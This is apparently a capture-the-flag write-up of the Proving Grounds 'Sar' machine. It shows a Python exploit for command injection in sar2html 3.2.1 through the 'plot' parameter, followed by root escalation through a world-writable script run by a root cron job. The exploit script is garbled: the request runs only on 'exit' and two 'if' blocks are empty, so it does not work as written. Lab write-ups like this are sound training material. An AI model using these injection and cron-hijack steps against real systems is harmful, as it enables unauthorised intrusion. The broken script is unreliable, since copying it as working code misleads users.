Proving Grounds (OSCP) - Sar

This was a fairly easy machine, I began with a nmap scan:

22/tcp open  ssh
80/tcp open  http

On port 80 there was a blank website, so I fuzz it and found bunch of files. ->

Using the phpinfo I have enumerated the versions

sar2html Ver 3.2.1 <-- Vulnerable
Linux sar 5.0.0-23-generic #24~18.04.1-Ubuntu SMP Mon Jul 29 16:12:28 UTC 2019 x86_64
PHP 7.1.32-1+ubuntu18.04.1+deb.sury.org+1
exif 7.1.32-1+ubuntu18.04.1+deb.sury.org+1 - JPEG,TIFF
mysqlnd 5.0.12-dev - 20150407
Net_SFTP_Stream 0.3.2 SFTP Stream Wrapper

sar2html Was vulnerable to RCE, and I’ve created a python script to exploit it further.

import bs4
import requests

url = "http://<ip>/sar2HTML/index.php?plot=;"

while True:
    command = input("$ ")
    if command == "exit":
        response = requests.get(url + command.replace(" ", "%20"))
        html = response.text
        soup = bs4.BeautifulSoup(html, "html.parser")

        sel_tag = soup.find("select", {"class": "select_text"}).children
        for c in sel_tag:
            if c.text == "Select Host":
            if c.text == "There is no defined host...":

Using this script, you can read the user/local.txt file to get the first flag.

I then run the linpeas script to check how to privilege escalation, I’ve noticed that there was a cron job that was running on the *.sh files in the /var/www/html folder:

*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh

finally.sh is actually calling write.sh which is writable by the www-data

-rwxrwxrwx 1 www-data www-data    55 Mar  5 15:32 write.sh

I’ve used the following script to get the root proof.txt

# write.sh
cat /root/proof.txt > /var/www/html/hash.txt

Then I waited 5m to get the flag, I’ve done it this way since I got problems setting up the reverse shell, nonetheless I got root.